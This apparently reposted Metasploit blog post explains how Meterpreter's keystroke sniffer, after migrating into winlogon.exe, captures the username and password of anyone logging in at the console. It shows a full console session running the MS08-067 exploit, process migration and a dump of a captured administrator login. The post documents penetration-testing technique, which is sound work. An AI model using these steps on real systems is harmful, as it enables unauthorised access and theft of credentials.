Capturing Logon Credentials with Meterpreter

In the previous post, we described the keystroke sniffing capabilities of the Meterpreter payload. One of the key restrictions of this feature is that it can only sniff while running inside of a process with interactive access to the desktop. In the case of the MS08-067 exploit, we had to migrate into Explorer.exe in order to capture the logged-on user’s keystrokes.

While testing the keystroke sniffer, we decided to migrate into the Winlogon.exe process instead. This process should have interactive access to the desktop, however we failed to sniff the active user’s keystrokes in this way. Although Winlogon could not access the logged-on desktop using GetAsyncKeyState, it can capture the username and password of anyone logging into the target’s console. The example below demonstrates this process:

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

PID Name Path
— —- —-
292 wscntfy.exe C:WINDOWSsystem32wscntfy.exe
316 Explorer.EXE C:WINDOWSExplorer.EXE
356 smss.exe SystemRootSystem32smss.exe
416 csrss.exe ??C:WINDOWSsystem32csrss.exe
440 winlogon.exe ??C:WINDOWSsystem32winlogon.exe
[ snip ]

meterpreter > migrate 440
[*] Migrating to 440…
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer…
[ wait for user login ]

meterpreter > keyscan_dump
Dumping captured keystrokes…
Administrator <Tab> [email protected] <Return>

Source: Metasploit Blog

1 comment to Capturing Logon Credentials with Meterpreter

  • NORZE

    Bun tutorial,este si un tutorial video pe ytbue.Bafta.Recent am descoperit comunitatile care trateaza probremele Securitatii IT pentesting etc,printre care si rstcenter .. nu stiam ca sunt si la noi ..La mai multe tutoriale bafta.

Leave a Reply

 

 

 

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*